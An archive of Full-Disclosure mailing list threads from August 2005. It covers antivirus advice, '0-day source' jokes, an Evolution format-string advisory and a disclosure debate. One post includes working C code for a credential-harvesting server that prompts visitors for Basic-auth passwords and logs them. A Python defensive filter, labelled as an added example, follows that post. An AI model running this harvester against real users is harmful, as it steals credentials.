and how much resources it takes up on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need some
> professional advice and well you guys know a lot. I need to get rid of our
> current Antivirus solution in the small 20+ user network we have running on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to be
> priced about the same for Canadian customers. I hope this is not too way off
> topic but I don't post here very often. If you can give me some advice that
> would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec
10. corporate sees it as a threat, and there's not any really good way
to centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Jason Bethune
Yes I meant to say my current corporate edition runs fine on my servers for
the most part, other than the yellow exclamation point in the VPtray in the
systray. I am mostly worried about how well these AV's perform on systems.
Need central administration for the program and the ability to lockout users
from performing any tasks related to the AV program.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Wednesday, August 10, 2005 1:33 PM
To: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

NAV and Symantec Corporate Edition aren't the same thing, although I don't
know for a fact that Corporate runs fine on a Terminal Server. 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.ziffdavis.com/seltzer
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 12:29 PM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
and how much resources it takes up on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need 
> some professional advice and well you guys know a lot. I need to get 
> rid of our current Antivirus solution in the small 20+ user network we 
> have running on SBS 2003. Currently running NAV 7.6 Corporate Edition. 
> Any opinions on the new version of Norton 10.0? Should I look at Trend 
> Micro? Both seem to be priced about the same for Canadian customers. I 
> hope this is not too way off topic but I don't post here very often. 
> If you can give me some advice that would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec 10.
corporate sees it as a threat, and there's not any really good way to
centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Evan Waite
Actually NAV Corp (aka SAV) works fine in Application and Admin mode for
Terminal services.  We've just completed an upgrade and so far
everything is working fine.  I would however recommend you only use
10.0.1.1000 (current) or higher (the first build of 10.0 was a little
flaky)

-E

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 10:29 AM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
and how much resources it takes up on the computers which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need some
> professional advice and well you guys know a lot. I need to get rid of our
> current Antivirus solution in the small 20+ user network we have running on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to be
> priced about the same for Canadian customers. I hope this is not too way off
> topic but I don't post here very often. If you can give me some advice that
> would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec
10. corporate sees it as a threat, and there's not any really good way
to centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Larry Seltzer
NAV and Symantec Corporate Edition aren't the same thing, although I don't
know for a fact that Corporate runs fine on a Terminal Server. 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.ziffdavis.com/seltzer
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 12:29 PM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
and how much resources it takes up on the computers on which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need some
> professional advice and well you guys know a lot. I need to get rid of our
> current Antivirus solution in the small 20+ user network we have running on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to be
> priced about the same for Canadian customers. I hope this is not too way
> off topic but I don't post here very often. If you can give me some advice
> that would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec 10.
corporate sees it as a threat, and there's not any really good way to
centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




RE: [Full-disclosure] Antivirus

2005-08-10 Thread Jason Bethune
I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
and how much resources it takes up on the computers on which the client is
installed.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Friedl [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 1:23 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
> I know this is not really the place to ask this question but I need some
> professional advice and well you guys know a lot. I need to get rid of our
> current Antivirus solution in the small 20+ user network we have running on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to be
> priced about the same for Canadian customers. I hope this is not too way
> off topic but I don't post here very often. If you can give me some advice
> that would be greatly appreciated.

One tidbit: if you use RAdmin (remote administration software), Symantec
10. corporate sees it as a threat, and there's not any really good way
to centrally deal with this. It's been a terrible mess.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Antivirus

2005-08-10 Thread Jason Bethune
I know this is not really the place to ask this question but I need some professional advice and well you guys know a lot. I need to get rid of our current Antivirus solution in the small 20+ user network we have running on SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the new version of Norton 10.0? Should I look at Trend Micro? Both seem to be priced about the same for Canadian customers. I hope this is not too way off topic but I don't post here very often. If you can give me some advice that would be greatly appreciated.

Jason




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cross-site http authentication

2005-08-10 Thread JustAsFire
Discovered: by JustAsFire [EMAIL PROTECTED]

Vulnerable: Any web page in which you can insert images hosted on
other servers.

Description: If a web page contains an image from a site which
requires authentication, a Username/Password prompt displaying the host
name and authentication realm will appear asking for username and
password. A malicious http server could be used to log the
credentials of the users who would authenticate.

POC:

/***
***name : AuthServer.c
***author   : JustAsFire JustAsFire[at]gmail.com
***description  : a very simple web server which sends a 401
***   Authorization request to anyone connecting to it. If the client
***   authenticates it stores the username and password in the file
***   userlog (encoded in base64).
***
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define MAXPENDING 5
/* The archived copy reads "BUFFSIZE 1", which cannot hold an HTTP request;
 * 4096 is an assumed value large enough for a typical request header. */
#define BUFFSIZE 4096

void Die(char *mess) { perror(mess); exit(1); }

/* Look for an "Authorization: Basic <base64>" header in the request. If it
 * is present, append the base64 token to the file "userlog" and return 1;
 * otherwise return 0. */
int GetCredientials(char *buffer){
    char s[200], *p;
    int i;
    FILE *f;

    p = strstr(buffer, "Authorization: Basic ");
    if (p) {
        if (strlen(p) > 50) {
            printf("Buffer overflow attempt");
            return 0;
        }

        /* skip the 21-byte header name; the 25 assumes the Authorization
         * header is the last one and is followed only by the blank line */
        for (i = 0; i + 25 < strlen(p); i++)
            s[i] = p[21 + i];
        s[i] = '\0';                    /* the original never terminated s */

        printf("\n%s\n", s);
        f = fopen("userlog", "a");
        if (f) {
            fprintf(f, "%s\n", s);
            fclose(f);
        }
        return 1;
    }
    else return 0;
}

void HandleClient(int sock){
    char buffer[BUFFSIZE];
    ssize_t n;

    /* leave room for a terminator: the original passed the raw read()
     * buffer to strstr() without NUL-terminating it */
    n = read(sock, buffer, BUFFSIZE - 1);
    if (n < 0)
        Die("Failed to receive bytes from client");
    buffer[n] = '\0';

    if (GetCredientials(buffer) == 0) {
        /* no credentials in this request: challenge the client with a 401 */
        const char *s = "HTTP/1.1 401 Authorization Required\n"
                        "Server: AuthServer/0.01 (Unix)\n"
                        "WWW-Authenticate: Basic realm=\"...It's a scam don't do it...\"\n"
                        "Keep-Alive: timeout=15, max=100\n"
                        "Connection: Keep-Alive\n"
                        "Transfer-Encoding: chunked\n"
                        "Content-Type: text/html; charset=iso-8859-1\n\n";
        write(sock, s, strlen(s));
    }
    close(sock);
}

int main (int argc, char *argv[]) {
    int serversock, clientsock;
    struct sockaddr_in server, client;

    if (argc != 2) {
        fprintf(stderr, "USAGE: AuthServer <port>\n");
        exit(1);
    }
    if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        Die("Failed to create socket");
    }

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(atoi(argv[1]));

    if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) {
        Die("Failed to bind the server socket");
    }

    if (listen(serversock, MAXPENDING) < 0) {
        Die("Failed to listen on server socket");
    }

    fprintf(stdout, "Created by: JustAsFire -- JustAsFire[at]gmail.com\n");
    fprintf(stdout, "Listening for connections...\n");

    while (1) {
        socklen_t clientlen = sizeof(client);
        if ((clientsock = accept(serversock, (struct sockaddr *) &client,
                                 &clientlen)) < 0) {
            Die("Failed to accept client connection");
        }
        fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr));
        HandleClient(clientsock);
    }
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
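As an added example (not part of the original post), here is a server-side filter in Python that implements the mitigation implied by the "Vulnerable:" line above: user-supplied HTML may only embed images whose src is relative or on an allowlisted host, so a third-party server never gets to answer one of your page's image requests with a 401 and raise a credential prompt. SITE_HOST, ALLOWED_IMAGE_HOSTS and the sample markup are assumptions constructed for the example.

```python
"""Keep user-supplied HTML from embedding images hosted on arbitrary
third-party servers: a hostile host could answer the image request with
401 + WWW-Authenticate and pop a Basic-auth prompt on our page."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed values: the host serving our own pages and the hosts we trust to
# serve images into them. Anything else is treated as untrusted.
SITE_HOST = "www.example.org"
ALLOWED_IMAGE_HOSTS = {"img.example.org"}


def image_src_allowed(src, site_host=SITE_HOST, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return True only for relative URLs or http(s) URLs on trusted hosts.

    Protocol-relative URLs ("//evil.invalid/x.gif") have an empty scheme but
    a non-empty netloc, so they fall through to the scheme check and fail.
    """
    u = urlparse(src.strip())
    if not u.scheme and not u.netloc:
        return True                      # relative path, served by us
    if u.scheme not in ("http", "https"):
        return False                     # data:, javascript:, file:, //host/
    host = (u.hostname or "").lower()
    return host == site_host or host in allowed_hosts


class ExternalImageFilter(HTMLParser):
    """Re-emit the document unchanged except for <img> tags pointing off-site."""

    def __init__(self):
        super().__init__(convert_charrefs=False)   # re-emit entities verbatim
        self.out = []
        self.rejected = []      # src values that were dropped, for logging

    def _emit_tag(self, tag, attrs):
        if tag == "img":
            src = dict(attrs).get("src") or ""
            if not image_src_allowed(src):
                self.rejected.append(src)
                self.out.append("<!-- external image removed -->")
                return
        self.out.append(self.get_starttag_text())

    def handle_starttag(self, tag, attrs):
        self._emit_tag(tag, attrs)

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, attrs)

    def handle_endtag(self, tag):
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append("&%s;" % name)

    def handle_charref(self, name):
        self.out.append("&#%s;" % name)

    def handle_comment(self, data):
        self.out.append("<!--%s-->" % data)


def strip_external_images(html):
    """Return (filtered_html, list_of_rejected_src_values)."""
    p = ExternalImageFilter()
    p.feed(html)
    p.close()
    return "".join(p.out), p.rejected


# Constructed sample of user-submitted content: one local avatar, one
# absolute off-site image, one protocol-relative off-site image.
SAMPLE_HTML = (
    '<p>Hi &amp; welcome. <img src="/avatars/1.png" alt="me"> '
    '<IMG SRC="http://attacker.invalid/x.gif"> '
    '<img src="//attacker.invalid/y.gif" /></p>'
)

if __name__ == "__main__":
    clean, rejected = strip_external_images(SAMPLE_HTML)
    print(clean)
    print("rejected:", rejected)
```

The rejected list is what you would feed to your logging, since repeated off-site image submissions from one account are worth a look.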


RE: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread srenna
LMFAO

Security folks are the best

what a dumb ass, where can i get 0-days WAA

http://home.maine.rr.com/mattyg/wambulance.jpg



>  Original Message 
> Subject: Re: [Full-disclosure] The best 0-day exploit source
> From: Stefan Schlott <[EMAIL PROTECTED]>
> Date: Wed, August 10, 2005 10:07 am
> To: full-disclosure@lists.grok.org.uk
> 
> Javi Polo wrote:
> 
> >>>can anybody suggest a website???
> >>
> >>http://127.0.0.1/0-d-Xpl0iz
> > 
> > 
> > [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> > --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
> >=> `0-d-Xpl0iz'
> > Connecting to 127.0.0.1:80... connected.
> > HTTP request sent, awaiting response... 403 Forbidden
> > 13:55:05 ERROR 403: Forbidden.
> > 
> > [EMAIL PROTECTED]:~$ 
> > 
> > who runs the site?
> > I want access
> 
> Hm, perhaps you should consult some... hm... adequate literature:
>http://ars.userfriendly.org/cartoons/?id=20010523
> 
> scnr ;)
> -- 
> *--- please cut here... -- thanks! ---*
> |-> E-Mail: [EMAIL PROTECTED]   PGP-Key: 0x2F36F4FE <-|
> | Apart from NT, I've never known any other system to crash while in its  |
> | idle loop.  |
> |   -- Seen on Slashdot (14.02.2000)  |
> *-*
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Samuel Beckett
 > can anybody suggest a website???

http://www.braindeath.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread James Longstreet
On Wed, 10 Aug 2005, Ahmad N wrote:

>  can anybody suggest a website???

http://www.sourceforge.net/

There's hundreds of 0-days there.  They're pretty well hidden though,
you'll have to do a lot of inspection to find them.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Adi Pircalabu
On Wed, 10 Aug 2005 13:56:04 +0200
Javi Polo <[EMAIL PROTECTED]> wrote:

> > >can anybody suggest a website???
> > http://127.0.0.1/0-d-Xpl0iz
> 
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.

wget is known to be broken on 127.0.0.1

-- 
Adrian Pircalabu


-- 
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://www.bitdefender.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Brian Beck
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.

[EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
--10:10:30--  http://127.0.0.1/0-d-Xpl0iz
=> `0-d-Xpl0iz'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

[ <=> ] 2,090 --.--K/s

10:10:30 (1364.30 MB/s) - `index.html' saved [2090]

Works fine here...appears to be a pretty fast site, too!

(nullman: just in case... see http://www.wordreference.com/definition/sarcasm)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re[2]: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Javier Reoyo


lol..!! try on 127.0.0.2, it's a mirror ;)

> On Aug/10/2005, [EMAIL PROTECTED] wrote:

>> >can anybody suggest a website???
>> http://127.0.0.1/0-d-Xpl0iz

> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.

> [EMAIL PROTECTED]:~$ 

> who runs the site?
> I want access




-- 
Regards,
 Javier    mailto:[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Stefan Schlott

Javi Polo wrote:

>>> can anybody suggest a website???
>>
>> http://127.0.0.1/0-d-Xpl0iz
> 
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>    => `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.
> 
> [EMAIL PROTECTED]:~$ 
> 
> who runs the site?
> I want access

Hm, perhaps you should consult some... hm... adequate literature:
  http://ars.userfriendly.org/cartoons/?id=20010523

scnr ;)
--
*--- please cut here... -- thanks! ---*
|-> E-Mail: [EMAIL PROTECTED]   PGP-Key: 0x2F36F4FE <-|
| Apart from NT, I've never known any other system to crash while in its  |
| idle loop.  |
|   -- Seen on Slashdot (14.02.2000)  |
*-*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Evolution multiple remote format string bugs

2005-08-10 Thread sitic
* SITIC Vulnerability Advisory *

           Advisory Name: Evolution multiple remote format string bugs
      Advisory Reference: SA05-001
 Date of initial release: 2005-08-10
                 Product: Evolution 1.5, 2.0, 2.1, 2.2, 2.3
                Platform: Linux, BSD systems, Unix
                  Effect: Remote code execution
Vulnerability Identifier: Not assigned


Overview:

Evolution suffers from several format string bugs when handling data from
remote sources. These bugs lead to crashes or the execution of arbitrary
assembly language code.


Details:

1) The first format string bug occurs when viewing the full vCard data
attached to an e-mail message.

When opening an e-mail message, only a compact view of some of the fields
from the vCard is displayed, and this does not trigger the vulnerability.
To be affected, the user must click on Show Full vCard or perform similar
actions such as clicking on Save in Addressbook and then viewing the saved
data under the Contacts tab.

Why is this important? An attacker might notice that an organisation uses
Evolution, for instance after seeing the "X-Mailer: Evolution x.y.z" e-mail
header in their e-mails. He or she could then send out e-mail messages with
malicious vCards to many e-mail accounts at the organisation, in the hope
that some of the recipients will view the full vCard data sooner or later,
thus exposing the organisation to this format string bug.


2) The second format string bug occurs when displaying contact data from
remote LDAP servers.


3) The third format string bug occurs when displaying task list data from
remote servers.


4) The fourth, and least serious, format string bug occurs when the user
goes to the Calendars tab to save task list data that is vulnerable to
problem 3 above. Other calendar entries that do not come from task lists
are also affected.


Mitigating factors:

Users that never use any of the vulnerable features in Evolution are not
affected.


Affected versions:

  o  Evolution 1.5 to Evolution 2.3.6.1


Recommendations:

We recommend that users either upgrade to Evolution 2.3.7 (unstable) or
apply our unofficial patch to their Evolution installation.


Patch information:

Evolution 2.3.7 is available from the following source:

  o  http://ftp.gnome.org/pub/gnome/sources/evolution/

Our unofficial patch is available from our home page:

  o  http://www.sitic.se


Acknowledgments:

These vulnerabilities were discovered by Ulf Harnhammar for SITIC, Swedish
IT Incident Centre.


Contact information:

Swedish IT Incident Centre, SITIC
P O Box 5398, SE-102 49 Stockholm, Sweden
Telephone: +46-8-678 5799
Email: sitic at pts dot se
http://www.sitic.se


Revision history:

First published 2005-08-10


About SITIC:

The Swedish IT Incident Centre within the National Post and Telecom Agency
has the task to support society in working with protection against IT
incidents. SITIC facilitates exchange of information regarding IT incidents
between organisations in society, and disseminates information about new
problems which potentially may impede the functionality of IT systems. In
addition, SITIC provides information and advice regarding proactive measures
and compiles and publishes statistics.


Disclaimer:

The decision to follow or act on information or advice contained in this
Vulnerability Advisory is the responsibility of each user or organisation.
SITIC accepts no responsibility for any errors or omissions contained within
this Vulnerability Advisory, nor for any consequences which may arise from
following or acting on information or advice contained herein.


Attachment: evolution.formatstring.patch
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Plaxo?

2005-08-10 Thread Todd Towles
> One small problem that may not have been noticed with Plaxo. 
> If the Plaxo using person decides to do so,  you can be a 
> non-Plaxo using person on that externally managed address 
> book with full email address also in there, added by the 
> Plaxo user. I have received "I have updated my Plaxo" for 
> whatever was updated, by several customers, at my help line 
> email address and have checked it out when at their premises. 
> Sure enough, there is my email address externally managed.
> 
> So, whether you allow Plaxo or not, if some user outside of 
> your company has all your email addresses within your company 
> on their computer, it has also likely been added to Plaxo by 
> them whether you like it or not.

Of course this would lead to increased spam and viruses at your mail
server, due to the spreading of e-mail addresses to computers that are
managed by people that aren't exactly security focused. Like I need
more...your computer is infected with a virus...junk mail.

-Todd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] "responsible disclosure" explanation (an exampleof the fallacy of idealistic thought)

2005-08-10 Thread Ken Pfeil

These are outdated:

On page 3:

Vulnerability Disclosure Process

Internet Security Systems’ X-Force engages in active programs of 
original Internet and network security research. The disclosure of 
vulnerability information is provided as a public service to
vendors, Internet Security Systems’ customers and the general public. 
The X-Force vulnerability disclosure process is divided into four stages:


I. Initial Discovery Phase
II. Vendor Notification Phase
III. Customer Notification Phase
IV. Public Disclosure Phase



"V." should read - Publicly bitch slap researcher and sue them off the 
planet (It's possible that this could also be substituted for Step II, 
III or IV depending upon the number of lawyers involved).


on page 4:

V. Accelerated Disclosure/Procedural Exceptions

X-Force reserves the right to accelerate the publication of the 
vulnerability information at any time if one or more of the following 
events occur:

• The vendor issues a patch or announcement regarding the vulnerability.
• An in-depth discussion of the vulnerability appears on a public 
mailing list.
• Active exploitation of any form related to the vulnerability is 
observed on the Internet.
• ISS receives evidence from reliable sources that an exploit is 
available in the wild.

• The vulnerability is reported by the media.
• The vendor becomes unresponsive.

The following point should be added here, and "V" changed to "VI"
• Refer to section V, above as these points are now moot. It does not 
matter that reliable techniques for exploitation are already being used, 
a patch is available, or the vendor becomes "unresponsive". If we're 
going to get sued by an 800lb Gorilla, it's every man for himself.


-k

Ingevaldson, Dan (ISS Atlanta) wrote:

> Just in case anyone is interested, the ISS Vulnerability Disclosure
> Guidelines were made public a couple years ago, and last revised on July
> 15, 2004.  The document is available here:
> 
> http://documents.iss.net/literature/vulnerability_guidelines.pdf
> 
> Regards,
> 
> --
> Daniel Ingevaldson
> Director, X-Force PSS
> [EMAIL PROTECTED] 
> 404-236-3160
> 
> Internet Security Systems, Inc.
> 
> Ahead of the Threat
> http://www.iss.net
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Matthew
> Murphy
> Sent: Tuesday, August 09, 2005 2:43 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] "responsible disclosure" explanation (an
> exampleof the fallacy of idealistic thought)
> 
> Let me just define "responsible disclosure" first of all, so as to
> dissociate myself from the lunatic lawyers of certain corporations
> (Cisco, HP, ISS, et al) who define "responsible disclosure" as
> "non-disclosure".  The generally accepted definition of responsible
> disclosure is simply allowing vendors advance notification to fix
> vulnerabilities in their products before information describing such
> vulnerabilities is released.  The overwhelming majority of researchers
> put a ceiling on what they consider "responsible" timelines on a
> vendor's part, but these vary widely.
> 
> Jason Coombs wrote:
> 
> > "responsible disclosure" causes serious harm to people. It is no 
> > different than being an accessory to the intentional destruction of 
> > innocent lives.
> 
> You seriously overstate the facts here, as a minute number of software
> vulnerabilities pose any threat to human life.  In the cases where a
> software flaw could potentially be responsible for the loss of an
> innocent life, the greatest error is still one in human judgment.
> 
> > Anyone who believes that "responsible disclosure" is a good thing 
> > needs to volunteer their time to teach law enforcement, judges, 
> > prosecutors, and attorneys that the consequence of everyone 
> > communicating with everyone else online is that some people use secret
> > knowledge of security vulnerabilities to ruin other people's lives or 
> > commit crimes by hijacking innocent persons' vulnerable computers.
> 
> You manage to draw absolutely no parallel between these two, so I'll try
